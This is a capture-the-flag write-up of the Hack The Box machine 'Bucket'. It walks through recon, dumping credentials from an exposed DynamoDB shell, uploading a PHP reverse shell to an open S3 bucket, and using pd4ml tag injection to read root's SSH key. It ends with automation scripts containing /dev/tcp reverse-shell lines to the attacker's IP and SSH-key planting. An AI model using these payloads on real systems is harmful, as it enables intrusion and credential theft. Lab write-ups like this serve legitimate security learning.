Hack The Box - Bucket Writeup
Bucket is a Medium-tier vulnerable Linux virtual machine, created by MrR3boot.
The goal of my participation in Hack The Box is to learn which tools are used for analysis and exploitation of a variety of protocols, and how to use them efficiently. A side goal is to be exposed to unfamiliar software.
Summary
Name | Bucket |
Creator | MrR3boot |
IP Address | 10.10.10.212 |
OS | Linux |
Release Date | 2020-10-17 |
Retirement Date | 2021-04-24 |
Difficulty | Medium (30 points) |
To begin the process, we notice that an advertising executive has decided to store images in The Cloud™. Notably, The Cloud™ has been left wide open; we are able to read private credentials from a DynamoDB instance, and upload files to the public website, by interacting with The Cloud™.
Once we upload a malicious file and synchronise, we discover a web application in development. The application accepts input from The Cloud™, and hands this input to a buggy PDF creation library. We send in a string, and download a PDF containing goodies, including the key to root
access.
Comfortably Numb
Running nmap
Firstly, we add the machine to /etc/hosts
, and run nmap
. The output from the detailed portscan reveals two services of interest.
Nmap scan report for bucket.htb (10.10.10.212)
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Upon visiting the homepage, nothing stands out visibly. We take a quick look at the source code, and notice that some images are sourced from a subdomain.
<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
So, we are dealing with one of Amazon's s3
buckets.
Adding this subdomain to /etc/hosts
is necessary here. Visiting the page, we are greeted by an insightful message:
{"status": "running"}
How exciting.
Trying to list the subdirectory leads to pain and suffering.
<Error>
<Code>NoSuchKey</Code>
<Message>The specified key does not exist.</Message>
<RequestID>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</RequestID>
</Error>
We'll need to learn how to use S3, but firstly, it might be worth scanning this subdomain.
Digging Around
Two interesting endpoints show up immediately upon scanning; health
and shell
.
> ffuf -u http://s3.bucket.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.0.2
________________________________________________
:: Method : GET
:: URL : http://s3.bucket.htb/FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
health [Status: 200, Size: 54, Words: 5, Lines: 1]
shell [Status: 200, Size: 0, Words: 1, Lines: 1]
--[[snip]]--
Incidentally, the response headers reveal that the server self-identifies as hypercorn-h11
.
The /health
endpoint reveals a dynamodb
service is lurking around somewhere... We'll have to keep an eye out.
{"services": {"s3": "running", "dynamodb": "running"}}
The /shell
endpoint attempts to redirect us to http://444af250749d:4566/shell/
. That looks like something worth overcoming.
Adding a /
to the end of the URL returns a DynamoDB JavaScript Shell
.
DynamoDB Reading
Learning The Shell
There are a range of code templates offerred to run in this GUI console. The list is as follows:
- PutItem
- UpdateItem
- DeleteItem
- BatchWriteItem
- GetItem
- BatchGetItem
- Query
- Scan
- CreateTable
- UpdateTable
- DeleteTable
- DescribeTable
- ListTables
- WaitFor
Firstly, we use ListTables
, and discover that the only table accessible is the users
table.
We ask for a description with DescribeTable
, and return the following result:
{
"Table" {
"AttributeDefinitions": [
0: {
"AttributeName": "username"
"AttributeType": "S"
},
1: {
"AttributeName": "password"
"AttributeType": "S"
}
],
"TableName": "users",
"KeySchema": [
0: {
"AttributeName": "username"
"KeyType": "HASH"
},
1: {
"AttributeName": "password"
"KeyType": "RANGE"
}
],
"TableStatus": "ACTIVE",
"CreationDateTime": "2020-10-xxTxx:30:05.055Z",
"ProvisionedThroughput": {
"LastIncreaseDateTime": "1970-01-01T00:00:00.000Z",
"LastDecreaseDateTime": "1970-01-01T00:00:00.000Z",
"NumberOfDecreasesToday": 0,
"ReadCapacityUnits": 5,
"WriteCapacityUnits": 5,
},
"TableSizeBytes": 107,
"ItemCount": 3,
"TableArn": "arn:aws:dynamodb:us-east-1:000000000000:table/users",
}
}
This should contain some juicy credentials...
The default examples did not contain any simple script to dump the contents of a table, so I wrote the below based on a StackOverflow post.
var params = {
TableName: "users",
Select: "ALL_ATTRIBUTES"
};
function doScan(response) {
if (response.error) ppJson(response.error);
else {
ppJson(response.data);
// Continue scanning if more data is possible
if ('LastEvaluatedKey' in response.data) {
response.request.params.ExclusiveStartKey = response.data.LastEvaluatedKey;
dynamodb.scan(response.request.params)
.on('complete', doScan)
.send();
}
}
}
console.log("Initiating Table Dump");
dynamodb.scan(params)
.on('complete', doScan)
.send();
Running this provided a response...
Juicy Creds
And the response contained user credentials!
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}
In summary, we are continuing with the following:
Cloudadm:Welcome123!
Sysadm:n2vM-<_K_Q:.Aa2
Mgmt:Management@#1@#
None of these credentials work for ssh
access. We will likely need to use the aws s3
API to gain a foothold.
Editor's Note: If we had met our user at this stage, or perhaps found their name on a theoretical expansive corporate website, we could have used a credential here for ssh without any further hassle.
The API appears to support 3 separate methods of access to s3
buckets.
s3
s3api
s3control
None of these function correctly when pointed to either s3://s3.bucket.htb
or http://s3.bucket.htb
. They all return strange errors.
Detached Buckets
I looked around for methods to run an s3
bucket instance without connection to the AWS cloud. There was an article on running Serverless S3, which contains usage examples for aws-cli
. The --endpoint
argument is the crucial element, and allows us to list the bucket contents!
> aws --endpoint http://s3.bucket.htb:80/ s3 ls
2020-10-28 xx:53:35 nikto-test-zpldnail.html
2020-10-28 xx:57:43 file.txt
2020-10-28 xx:49:04 adserver
A reverse shell as www-data can be grabbed by uploading a PHP payload to the open adserver
bucket, and synchronising to the main website!
> aws --endpoint http://s3.bucket.htb:80/ s3 ls s3://adserver
PRE images/
2020-10-xx xx:03:05 5344 index.html
> aws --endpoint http://s3.bucket.htb:80/ s3 cp s.php s3://adserver/s.php
upload: ./s.php to s3://adserver/s.php
> aws --endpoint http://s3.bucket.htb:80/ s3 ls s3://adserver
PRE images/
2020-10-xx xx:03:05 5344 index.html
2020-10-xx xx:03:57 5493 s.php
> aws --endpoint http://s3.bucket.htb:80/ s3 website s3://adserver
> curl -v http://bucket.htb/s.php
These steps needed to be taken in quick succession. No AWS credentials were required.
We receive a shell as www-data
!
> nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.38] from bucket.htb [10.10.10.212] 52634
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
10:04:28 up 4:36, 0 users, load average: 0.28, 0.21, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami && id && hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket
Hello, IT!
Have You Tried Turning
From here, there is a good chance that one of our credentials is valid for a user on the box. I'll hedge my bets on the Sysadm
credential.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@bucket:/$ ls /home
roy
www-data@bucket:/$ su roy
Password: n2vM-<_K_Q:.Aa2
roy@bucket:/$ cat /home/roy/user.txt
0775bff...
roy@bucket:/$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),1001(sysadm)
We have user.txt
! Note that we can log in as roy
with this credential over ssh
directly.
It Off and On Again?
We run a quick recon, including a process monitor, and notice two facts:
- port
4566
is locally accessible, and - there is a cronjob running
aws-cli
commands against that port!
xx:28 96507 root /usr/bin/python3 /usr/bin/aws --endpoint-url=http://localhost:4566 s3 sync /root/backups/ s3://adserver
Notably, the following command (whether run on the attacking host or the remote host) grants the same username / password information as was accessible through the /shell/
page earlier. My code was, sadly, unnecessary.
$ aws --endpoint-url=http://localhost:4566 dynamodb scan --table-name users
{
"Items": [
{
"password": {
"S": "Management@#1@#"
--[[snip]]--
What other aws services could be accessible?
Plenty of them, but as it turns out, there are some more interesting fish in the sea.
Bucket Application
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
DocumentRoot /var/www/bucket-app
</VirtualHost>
--[[snip]]--
I initially checked whether mpm_itk_module
was vulnerable, but it's just a required module for reassigning the user under which the VHost is running...
This vhost (running as root
!) turns out to be an application that connects to DynamoDB, with an interesting piece of functionality at the top of the index.php
file.
$ ls -al /var/www/bucket-app
total 856
drwxr-x---+ 4 root root 4096 Sep 23 10:56 .
drwxr-xr-x 4 root root 4096 Sep 21 12:28 ..
-rw-r-x---+ 1 root root 63 Sep 23 02:23 composer.json
-rw-r-x---+ 1 root root 20533 Sep 23 02:23 composer.lock
drwxr-x---+ 2 root root 4096 Oct xx 08:44 files
-rwxr-x---+ 1 root root 17222 Sep 23 03:32 index.php
-rwxr-x---+ 1 root root 808729 Jun 10 11:50 pd4ml_demo.jar
drwxr-x---+ 10 root root 4096 Sep 23 02:23 vendor
$ cat /var/www/bucket-app/index.php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));
foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
--[[snip]]--
The rest of the file is an "Under Construction" page for a <Bucket Application/>
. No other interesting code execution occurs.
A quick search on the pd4ml
library they are using in this snippet brings up a recent bug bounty writeup, demonstrating an easily usable tag for arbitratry file reading, <pd4ml:attachment src="file:///etc/passwd"><pd4ml:attachment>
.
Editor's Note - this must have been intentionally obfuscated...
Local File Inclusion
Exploiting pd4ml
I believe that creating and populating a DynamoDB
table called alerts
will allow us to read some critical files, and gain full root access.
After reading a lot of documentation, I ended up with an understanding of the arguments required to create a table.
> aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb create-table --table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
{
"TableDescription": {
"AttributeDefinitions": [
{
"AttributeName": "title",
"AttributeType": "S"
},
{
"AttributeName": "data",
"AttributeType": "S"
}
],
"TableName": "alerts",
"KeySchema": [
{
"AttributeName": "title",
"KeyType": "HASH"
},
{
"AttributeName": "data",
"KeyType": "RANGE"
}
],
"TableStatus": "ACTIVE",
"CreationDateTime": 160xxxxxxx.237,
"ProvisionedThroughput": {
"LastIncreaseDateTime": 0.0,
"LastDecreaseDateTime": 0.0,
"NumberOfDecreasesToday": 0,
"ReadCapacityUnits": 5,
"WriteCapacityUnits": 5
},
"TableSizeBytes": 0,
"ItemCount": 0,
"TableArn": "arn:aws:dynamodb:us-east-1:000000000000:table/alerts"
}
}
> aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb put-item --table-name alerts \
--item '{
"title":{"S":"Ransomware"},
"data":{"S":"<pd4ml:attachment src=\"file:///etc/passwd\"><pd4ml:attachment>"}
}'
{
"ConsumedCapacity": {
"TableName": "alerts",
"CapacityUnits": 1.0
}
}
We quickly attempt to trigger the behaviour in the index.php
file.
$ curl -X POST localhost:8000 --data "action=get_alerts"
$ ls /var/www/bucket-app/files
2925.html result.pdf
$ cat /var/www/bucket-app/files/*
<pd4ml:attachment src="file:///etc/passwd"><pd4ml:attachment>%PDF-1.4
%
The file inclusion didn't trigger... How sad.
A real PDF is created when we use a simple string without this supposed LFI tag.
Testing the LFI
I added my ssh
key to /home/roy/.ssh/authorized_keys
, and automated the testing process in order to debug faster, using this script:
#!/usr/bin/env bash
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb create-table --table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 > /dev/null
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb put-item --table-name alerts \
--item '{
"title":{"S":"Ransomware"},
"data":{"S":"'"$*"'"}
}' > /dev/null
ssh roy@bucket.htb 'curl -s -X POST localhost:8000 --data "action=get_alerts"'
scp -r roy@bucket.htb:/var/www/bucket-app/files .
ssh roy@bucket.htb 'cat /var/www/bucket-app/files/*'
Eventually, I hit upon the other documented file-related tag in pd4ml
: <pd4ml:include>
!
> ./aws.sh '<pd4ml:include src=\"file:///root/root.txt\" />'
5852.html 100% 45 2.4KB/s 00:00
result.pdf 100% 1502 80.4KB/s 00:00
<pd4ml:include src="file:///root/root.txt" />%PDF-1.4
%
1 0 obj
% [24]
<<
/Filter /FlateDecode
--[[snip]]--
Opening the PDF file revealed the flag in plaintext! We have the flag, but not a shell. Let's continue...
Grabbing the SSH Key
Another fun feature of this particular LFI is directory listings. Included below are the textual contents of some PDF files.
.aws
.bash_history
.bashrc
.cache
.config
.java
.local
.profile
.ssh
backups
docker-compose.yml
files
restore.php
restore.sh
root.txt
snap
start.sh
sync.sh
authorized_keys
id_rsa
id_rsa.pub
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC--[[snip]]--
We copy this key out to a plaintext file, delete the following notice from the bottom of the file:
pd4ml evaluation copy. visit http://pd4ml.com
And we can connect as root!
> pdftotext files/result.pdf id_rsa
> vim id_rsa # manual cleanup of line breaks
> chmod 600 id_rsa
> ssh -i id_rsa root@bucket.htb
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)
--[[snip]]--
Last login: xxx Oct xx xx:06:55 2020 from 10.10.14.38
root@bucket:~# whoami && id && hostname && wc -c root.txt
root
uid=0(root) gid=0(root) groups=0(root)
bucket
33 root.txt
After Root
Auto-root Script
We can start by automating the user shell, in order to plant our SSH key. This is intentionally done through s3; we could have a shell using ssh
just as easily, with our knowledge of roy
's password.
Note that this script takes a few tries to synchronise the reverse shell file.
#!/usr/bin/env bash
# Fixed credential for Roy
roypw='n2vM-<_K_Q:.Aa2'
# Get tunnel IP address
ipadd=$(ip addr | grep -o "10.10.14.[^/]*")
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/${ipadd}/2222 0>&1'\"); ?>" > s.php
function listener {
sleep 0.05
echo "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'
su roy
${roypw}
cd ~ && mkdir -p ~/.ssh && echo '$(cat ~/.ssh/id_rsa.pub)' > ~/.ssh/authorized_keys
/bin/bash -i >& /dev/tcp/${ipadd}/3333 0>&1
" | nc -lv -q 1 -i 1 -p 2222 && touch .done > /dev/null
if [ "$?" -eq 0 ]; then echo "[+] Shell as Roy active, press return!"; fi
}
function revsh {
echo "[-] Uploading reverse shell..."
while ! [ -f ./.done ]; do
aws --endpoint http://s3.bucket.htb:80/ s3 cp s.php s3://adserver/s.php
aws --endpoint http://s3.bucket.htb:80/ s3 website s3://adserver
sleep 1 && curl -s http://bucket.htb/s.php | grep -q 404
done
rm .done
}
listener &
revsh &
# grab shell as roy
sleep 0.02
nc -lvp 3333
This returns a reverse shell as Roy, while also helpfully adding our SSH key to his authorized_keys
file.
We can now automate downloading the flag as a PDF, converting it to (mangled) text with the pdftotext
utility, correcting the text, and using SSH to connect as root!
#!/usr/bin/env bash
# Fixed credential for Roy
roypw='n2vM-<_K_Q:.Aa2'
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb create-table --table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 > /dev/null
aws --endpoint-url http://s3.bucket.htb:80/ \
dynamodb put-item --table-name alerts \
--item '{
"title":{"S":"Ransomware"},
"data":{"S":"<pd4ml:include src=\"file:///root/.ssh/id_rsa\" />"}
}' > /dev/null
sshpass -p "${roypw}" ssh roy@bucket.htb 'curl -s -X POST localhost:8000 --data "action=get_alerts"'
sshpass -p "${roypw}" scp roy@bucket.htb:/var/www/bucket-app/files/result.pdf id_rsa.pdf
pdftotext id_rsa.pdf id_rsa
sed -i -e $'s/BEGIN OPENSSH PRIVATE KEY----/BEGIN OPENSSH PRIVATE KEY-----\\\n/' \
-e '/pd4ml/d' id_rsa
head -n2 id_rsa
echo ...
echo
echo "[+] SSH shell coming right up."
echo
chmod 600 id_rsa
ssh -i id_rsa root@bucket.htb
These scripts could easily be joined together if desired, however, this is left as an exercise for the reader!
Thanks to the box author. This was a great excuse to learn about the surface level of S3 bucket interaction. I'll likely have a reason to look more closely at this technology in the future...